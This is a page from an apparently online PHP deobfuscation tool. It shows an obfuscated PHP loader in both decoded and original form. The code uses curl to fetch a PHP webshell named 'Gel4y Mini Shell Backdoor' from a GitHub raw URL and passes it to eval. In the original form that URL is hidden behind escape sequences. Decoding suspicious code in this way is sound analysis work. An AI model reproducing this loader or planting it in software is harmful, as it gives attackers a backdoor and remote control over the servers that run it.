Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //Obfuscate by https://uutool.cn/php/ goto HtunK; QZD_L: function g5wFz($dDXPn) {..

Decoded Output download

<?php 
//Obfuscate by https://uutool.cn/php/ 
 goto HtunK; QZD_L: function g5wFz($dDXPn) { goto cSIb5; Tx6Ge: curl_setopt($zpEji, CURLOPT_RETURNTRANSFER, 1); goto BdrKS; RHVqx: $stK0C = curl_exec($zpEji); goto va1WR; jd9er: return $stK0C; goto AnaRD; cSIb5: $zpEji = curl_init(); goto O0hHe; BdrKS: curl_setopt($zpEji, CURLOPT_URL, $dDXPn); goto RHVqx; O0hHe: curl_setopt($zpEji, CURLOPT_HEADER, 0); goto Tx6Ge; va1WR: curl_close($zpEji); goto jd9er; AnaRD: } goto nrvr9; XoPX7: goto CemMq; goto o1A1T; oDHOi: V2KUz: goto w_WCd; iq7aX: eval("{$PdMuO}" . g5WFz("https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/refs/heads/1.x.x/gel4y.php")); goto wsMDg; wsMDg: goto TFslk; goto Rl2VC; MJnmN: X9mo7: goto iq7aX; nrvr9: goto V2KUz; goto oDHOi; o1A1T: CemMq: goto QZD_L; HtunK: echo "%MEK////sasas/MEKA
"; goto XoPX7; w_WCd: $PdMuO = "?>"; goto DUaYh; DUaYh: goto X9mo7; goto MJnmN; Rl2VC: TFslk: ?>

Did this file decode correctly?

Original Code

<?php
//Obfuscate by https://uutool.cn/php/
 goto HtunK; QZD_L: function g5wFz($dDXPn) { goto cSIb5; Tx6Ge: curl_setopt($zpEji, CURLOPT_RETURNTRANSFER, 1); goto BdrKS; RHVqx: $stK0C = curl_exec($zpEji); goto va1WR; jd9er: return $stK0C; goto AnaRD; cSIb5: $zpEji = curl_init(); goto O0hHe; BdrKS: curl_setopt($zpEji, CURLOPT_URL, $dDXPn); goto RHVqx; O0hHe: curl_setopt($zpEji, CURLOPT_HEADER, 0); goto Tx6Ge; va1WR: curl_close($zpEji); goto jd9er; AnaRD: } goto nrvr9; XoPX7: goto CemMq; goto o1A1T; oDHOi: V2KUz: goto w_WCd; iq7aX: eval("{$PdMuO}" . g5WFz("\x68\x74\x74\160\x73\72\57\x2f\x72\141\167\x2e\x67\x69\x74\x68\165\x62\x75\x73\x65\162\x63\157\156\164\145\156\164\x2e\x63\x6f\x6d\57\x32\62\130\x70\x6c\x6f\151\x74\x65\162\103\162\145\x77\x2d\x54\x65\x61\x6d\x2f\107\145\154\64\x79\55\x4d\151\x6e\151\55\x53\x68\x65\154\x6c\55\x42\x61\143\x6b\x64\x6f\157\x72\x2f\x72\145\146\x73\x2f\x68\x65\141\x64\x73\57\x31\x2e\x78\56\170\x2f\147\x65\x6c\64\171\x2e\160\150\x70")); goto wsMDg; wsMDg: goto TFslk; goto Rl2VC; MJnmN: X9mo7: goto iq7aX; nrvr9: goto V2KUz; goto oDHOi; o1A1T: CemMq: goto QZD_L; HtunK: echo "\x25\115\x45\113\57\x2f\57\x2f\x73\x61\x73\x61\x73\342\230\x85\57\x4d\x45\x4b\x41\12"; goto XoPX7; w_WCd: $PdMuO = "\x3f\x3e"; goto DUaYh; DUaYh: goto X9mo7; goto MJnmN; Rl2VC: TFslk:

Function Calls

None

Variables

None

Stats

MD5 b635e1e1325ef91a9af6cf47ad82a7fb
Eval Count 0
Decode Time 45 ms